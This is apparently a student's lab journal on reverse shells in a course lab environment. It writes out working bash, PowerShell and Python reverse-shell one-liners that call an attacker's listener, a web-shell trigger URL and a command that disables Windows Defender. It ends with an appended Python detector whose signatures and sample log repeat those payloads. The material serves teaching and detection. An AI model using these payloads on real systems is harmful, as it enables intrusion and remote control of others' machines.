Lab 8.2 - Zacham17/my-tech-journal GitHub Wiki

Lab 8.2: Reverse Shells

Bash Reverse Shell in Linux

  • I used the sec335-rocky host as a target for this part of the lab.
  • I SSH'd into sec335-rocky at 10.0.17.200
  • On my kali VM, I used the command nc -nlvp 4449 to listen for connections on port 4449.
  • In the ssh session on rocky, I used the command /bin/bash -i >& /dev/tcp/10.0.17.125/4449 0>&1
    • This command uses the eth0 ip from the KaliVM
  • Back on the kali VM, I now have shell access to sec335-rocky
  • I then started a wireshark capture with a filter for port 4449, and ran some commands from the reverse shell. I then followed the TCP stream and saw the commands I entered and their outputs.

Reverse Shell on Pippin

  • To get a reverse shell to pippin, I made a small shell script, called zmorprs.sh containing the command /bin/bash -i >& /dev/tcp/10.0.99.53/4449 0>&1
  • I then uploaded the file to the Pippin host via ftp.
  • On my kali VM, I then used the command nc -nlvp 4449 to listen for connections on port 4449.
  • From the browser, I executed the uploaded script using the URL http://10.0.5.25/upload/zmor.php?cmd=/bin/bash+zmorprs.sh
    • The zmor.php file is from Lab 7.1
  • This gave me access to the bash prompt on pippin from my kali VM. I was then able to execute commands.

Reverse Shell Using Windows Powershell

  • On my Kali VM, I ran the command nc -nlvp 4449 to listen for connections on port 4449.
  • On my Windows VM, I ran the following command from the terminal:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.125',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
  • This produced an error, as it was blocked by Windows Defender.
  • I disabled Windows Defender with the powershell command Set-MpPreference -DisableRealtimeMonitoring $true
  • I then ran the powershell command again, and this time no errors were produced and I got shell access to my Windows VM from my Kali VM.

Reverse Shell Using Python

  • I found a python script online that I was able to use to get a reverse shell
    • I found the python script here
  • On my kali VM, I used the command nc -nlvp 4449 to listen for connections on port 4449.
  • On sec335-rocky, I typed the command python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.125",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
  • This gave me shell access to sec335-rocky from my Kali VM.
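Each of the four techniques above leaves the same kind of trace on the target: a process command line that opens an outbound TCP connection and wires a shell to it, plus, in the Windows case, a command that turns Defender's real-time monitoring off first. The following is an added detection example, not part of this lab journal and not code from the course; it assumes a constructed command-line log format (host=... user=... cmd=...) and scans it for the four indicator patterns used in this lab, pulling out the remote IP:port so an analyst can pivot to a packet capture filter the way the lab did with Wireshark on port 4449.

```python
import re
from typing import List, NamedTuple, Set

# Indicator patterns for the command lines seen in this lab. Each entry is a
# (label, compiled regex) pair; the regex is applied to the command field only.
REVERSE_SHELL_SIGNATURES = [
    ("bash /dev/tcp redirect",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("PowerShell TCPClient + iex loop",
     re.compile(r"System\.Net\.Sockets\.TCPClient.*\biex\b", re.IGNORECASE)),
    ("Python socket dup2 + pty.spawn",
     re.compile(r"os\.dup2\(.*pty\.spawn\(")),
    ("Defender real-time monitoring disabled",
     re.compile(r"Set-MpPreference\s+-DisableRealtimeMonitoring\s+\$true", re.IGNORECASE)),
]

# Assumed (constructed) log line layout: host=<name> user=<name> cmd=<command line>
LOG_LINE = re.compile(r"^host=(\S+)\s+user=(\S+)\s+cmd=(.*)$")

# Pulls "ip:port" out of the three connect styles on the page:
#   /dev/tcp/10.0.17.125/4449   TCPClient('10.0.17.125',4449)   connect(("10.0.17.125",4449))
IP_PORT = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})[\"']?\s*[,/]\s*(\d{1,5})\b")


class Finding(NamedTuple):
    line_no: int
    host: str
    user: str
    label: str
    remote: str  # "ip:port" when the command line exposes one, else ""


def scan_log(lines: List[str]) -> List[Finding]:
    """Return one Finding per (log line, matching signature)."""
    findings: List[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        m = LOG_LINE.match(line.rstrip("\n"))
        if not m:
            continue  # not in the assumed format; skip rather than guess
        host, user, cmd = m.groups()
        for label, pattern in REVERSE_SHELL_SIGNATURES:
            if pattern.search(cmd):
                ep = IP_PORT.search(cmd)
                remote = f"{ep.group(1)}:{ep.group(2)}" if ep else ""
                findings.append(Finding(line_no, host, user, label, remote))
    return findings


def remote_endpoints(findings: List[Finding]) -> Set[str]:
    """Distinct listener endpoints, useful as a capture filter (e.g. port 4449)."""
    return {f.remote for f in findings if f.remote}


# Constructed sample log: the lab's own command lines plus two benign-looking ones.
SAMPLE_LOG = [
    "host=sec335-rocky user=student cmd=/bin/bash -i >& /dev/tcp/10.0.17.125/4449 0>&1",
    "host=sec335-rocky user=student cmd=ls -la /var/log",
    "host=win-vm user=student cmd=powershell -c \"$client = New-Object System.Net.Sockets.TCPClient('10.0.17.125',4449); $stream = $client.GetStream(); $sendback = (iex $data 2>&1 | Out-String)\"",
    "host=win-vm user=student cmd=powershell Set-MpPreference -DisableRealtimeMonitoring $true",
    "host=sec335-rocky user=student cmd=python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.17.125\",4449));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'",
    "host=pippin user=www-data cmd=/bin/bash zmorprs.sh",
]

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f.line_no}: {f.host} ({f.user}) -> {f.label} {f.remote}")
    print("listener endpoints:", sorted(remote_endpoints(results)))
```

Note what the last sample line shows: the Pippin variant, where the one-liner lives inside zmorprs.sh and the command line is just "/bin/bash zmorprs.sh", produces no finding. Command-line matching alone misses payloads wrapped in a file or a web-shell parameter, which is why the lab's network-side view (the Wireshark stream on port 4449) and file-content inspection are the complementary checks.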

Reflection:

This lab taught me about various ways of using reverse shells and the different vulnerabilities that systems may have. In this lab, I did struggle at first in getting a reverse shell on Pippin, but I later found out that I had the incorrect IP address in the zmorprs.sh file and I had the filetype as .php instead of .sh, but once I fixed the errors, I smoothly carried on throughout the lab.